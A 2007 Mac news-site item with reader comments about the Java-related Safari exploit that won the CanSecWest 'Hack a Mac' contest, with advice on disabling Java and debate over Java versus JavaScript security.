“According to Matasano (home base for security researcher Dino Dai Zovi), the announced-but-unreleased web browser exploit that was used to win the CanSecWest MacBook Pro challenge involves browser support for Java. Turn off Java for Safari (or Firefox, or Camino) and your machine is immune,” Michael Rose reports for TUAW.
Full article here.
“The vulnerability affects Firefox as well as Safari,” Matasano Chargen reports.
Full article here.
[Thanks to MacDailyNews Reader “Adam W.” for the heads up.]
MacDailyNews Take: The story clarifies. As it always seems to do after the damage is done in the media (meanwhile, Mac users continue to surf the Web unaffected). So, that’s some Mac OS X “hack,” huh? Ten grand and a MacBook Pro for that? Pfft. We await InfoWorld’s next hysterical headline regarding this developing story with bated breath.
MacDailyNews Note: To protect yourself from this unreleased-in-the-wild, yet extremely over-publicized scourge, in Safari’s Preferences, uncheck “Enable Java” in the “Security” tab. In Firefox’s Preferences, uncheck “Enable Java” in the “Content” tab.
Related articles:
InfoWorld publishes false report on Apple Mac security – April 21, 2007
CanSecWest’s $10,000 ‘Hack a Mac’ challenge relaxes barriers, finds exploitable hole in Safari – April 20, 2007
Apple MacBooks hold strong, remain unhacked after first day of $10,000 ‘Hack a Mac’ challenge – April 20, 2007
CanSecWest sweetens ‘Hack a Mac’ contest pot to $10,000 – April 20, 2007
CanSecWest to hold ‘PWN to OWN’ contest: pits Apple MacBook Pros vs. hackers – March 26, 2007
Microsoft’s oft-delayed, much-pared-down Windows Vista hacked at Black Hat – August 07, 2006
Microsoft publicity stunt asks hackers to attack Windows Vista – August 04, 2006
Apple Mac remains ‘unhacked’ as University of Wisconsin’s Mac OS X Security Challenge ends – March 08, 2006
Mac OS X ‘unhacked’ over 24 hours and counting in genuine security challenge – March 07, 2006
*sigh*
Yes… Sun make Java, but the runtime for OSX comes via Apple (a fact they seem to be very proud of), which is why it’s always a minor version or two behind.
A-Hole has this on the article…
EXCLUSIVE: MUST CREDIT MATASANO
More details as they become available. In the meantime, a drinking game: predict the rationalizations given by Mac zealots for why this finding “doesn’t count”.
I’ll start: “It took $10,000 to break a Mac, but people break Windows machines for free every day!”
What a windows fanboy trolling for hits…
You get what you ask for. Regardless of the technology used to hack into the mac, it was done. This is the problem with these kind of hyper visible contests.
I’m not drinking coffee nor traveling to Indonesia just to be safe.
No word on the remaining Mac and even more lowered barriers.
Seems the second one survived without so much as a say so.
@Macaday
Turning off Java doesn’t affect Apple.com at all. Silly boy.
” width=”19″ height=”19″ alt=”smile” style=”border:0;” />
You didn’t turn off “Javascript”, did you? Those are very different beasts, Java and Javascript.
I’m a bit surprised that the exploit uses Java instead of javascript. I always thought of Java as being very secure by design, a very strict and well thought out platform. Javascript, on the other hand, is pretty much anything goes, and is taken advantage of in the vast majority of browser hacks (in windows, at least.)
For a platform that has “security by obscurity”, there sure are a lot of high-profile attempts to hack it!
MW: “another” one bites the dust!
@WiseGuy – How the hell is the EFI going to connect to my wireless network (only one active on my home network)? Seriously, does the EFI load all the pieces necessary for an active network connection, I think not.
Stop the FUD!
MDN word: rest, as in give it a rest….
@WiseGuy – How the hell is the EFI going to connect to my wireless network (only one active on my home network)? Seriously, does the EFI load all the pieces necessary for an active network connection, I think not.
Stop the FUD!
MDN word: rest, as in give it a rest….
” width=”19″ height=”19″ alt=”cool smirk” style=”border:0;” />
Traveller wrote: “I’m a bit surprised that the exploit uses Java instead of javascript. I always thought of Java as being very secure by design, a very strict and well thought out platform. Javascript, on the other hand, is pretty much anything goes, and is taken advantage of in the vast majority of browser hacks (in windows, at least.)”
Actually, it’s the other way around, as far as security goes, because one can do so much more with Java. It has access, for example, to the underlying OS, and so it has access to your hard drive, etc. Javascript, on the other hand, is much more limited in what it can do.
Java has always posed a threat, in my mind, and so i have always kept it turned off. I am not surprised that someone was able to use it as an exploit. It bears saying that all the hacker had to do to win the prize was to read a file on the disc, and follow its instructions. With Java, one can access files. My understanding of this exploit is that they were able to trick Java into thinking they should be granted root access for reading files (and nothing more).
I think i have only ever encountered two or three websites which wanted Java turned on for one reason or another. On the other hand, i have encountered many websites which expected and/or depend on Javascript.
It’s unfortunate that Javascript is called what it is. As others have mentioned, they are completely different critters, and most folks don’t know that, nor the difference between them.
If you use NetNewsWire, remember to turn off Java in it as well. Java is enabled by default.
Rainy Day wrote “Actually, it’s the other way around, as far as security goes, because one can do so much more with Java.”
I highly doubt that. According to Wikipedia, “Java has similar security issues but these are considered less serious because the Java virtual machine provides a well-defined sandboxing model today (as of 2007) require Java, whereas many use JavaScript.”
This is pretty tough to explain exactly why, you probably won’t be able to really understand the subtle differences between Java and Javascript without having first hand programming experience.
Java is a high level object-oriented programming language, that has a strong emphasis on encapsulation. Every Java object and subroutine has a privacy modifier such as “public” or “private” that is meant to restrict access between different programs whenever possible. Javascript also has objects and privacy modifiers, but they were added to the language later, they are not an integral part of its design like Java. Many features have actually been added to Javascript over the years, that it is just as, if not more powerful, then Java. The advantage to Java is not it’s power, but it’s more restrictive design, which gives it better security and more coherent structures.
Also, Java runs between platforms as byte-code, semi-compiled programs that can run on any platform that implements a Java virtual machine. Javascript, on the other hand, runs as a script which is compiled as the browser reads the Javascript. It does not have a virtual machine to implicitly manage sandboxing it.
I also know for a fact that there are numerous websites that will instantly infect a Windows computer with a trojan by using Javascript (many, many websites! mostly porn sites.) I don’t know of any sites that do this through Java; I’m sure some exist, since both languages have similar security issues, but Javascript exploits are more common because they are easier and nearly every web browser uses Javascript.
Correction: The Wikipedia quote from it’s Javascript page reads:
“Java has similar security issues but these are considered less serious because the Java virtual machine provides a well-defined sandboxing model and few Web sites today (as of 2007) require Java, whereas many use JavaScript.”
While this does need to be addressed by Apple, the fundamental flaw revolves around java and QT interaction.
The solution, and one we have utilized for several years now is this.
1) Set up an Admin account and never use it. (Just for the most essential of installs)
2) Set up a clean standard account. Never touch it, only use when trouble shooting.
2) Set up your standard user accounts. Keep java enabled but only browse to sites that are trusted. We literally use only about a handful of sites on a daily basis, so it is not that difficult. Browsers such as Safari and Camino and Firefox allow some level of protections toward limiting what certain sites can do. Learn them and use them. Safari by parental control, Camino and FF by preferences.
3) Set up a seperate and either standard or limited user account that is used for general web surfing (ie. untrusted sites). This account is used only for web surfing and other non essential tasks if you so see fit. If you are so privileged, use an entirely different and isolated Mac for general web surfing, (instead of just a seperate account).
The web is a fun place and there are great sites out there, but as is always the case there are bad neighborhoods. I am not nieve enough to believe that Mac OS X is invulnerable, as it is always the things you don’t know that hurt you the most.
Either if it is Java or JavaScript, looks like just another job for NoScript
” width=”19″ height=”19″ alt=”smile” style=”border:0;” />
http://noscript.net
If you want to use Noscript, that’s fine for you. But I can’t be bothered to constantly give websites permission to run. Almost every website I use has Javascript. This website is using it right now to let us post comments!
There is so little chance of finding a malicious script that works on a mac. And with my kind of luck, (the bad kind), the one time I find one these websites on a mac, I will have clicked the allow button or whatever to let it run through NoScript, not knowing it was a bad script. I would have just wasted all that time blocking innocent scripts just to let the one bad one through. That’s some windows type security shit! I switched to mac to not have to worry about things like that.
“There is so little chance of finding a malicious script that works on a mac”
Well, it depends on your definition of “malicious”.
” width=”19″ height=”19″ alt=”raspberry” style=”border:0;” />
If stealing your credentials and/or peeking in your web mail is malicious enough, I bet you’ll have fun here:
After you understand what is XSS, what it can do and how it is completely OS-independent (it just needs any JavaScript enabled browser), you may reconsider NoScript
” width=”19″ height=”19″ alt=”wink” style=”border:0;” />
http://noscript.net
oops, it was http://sla.ckers.org — have fun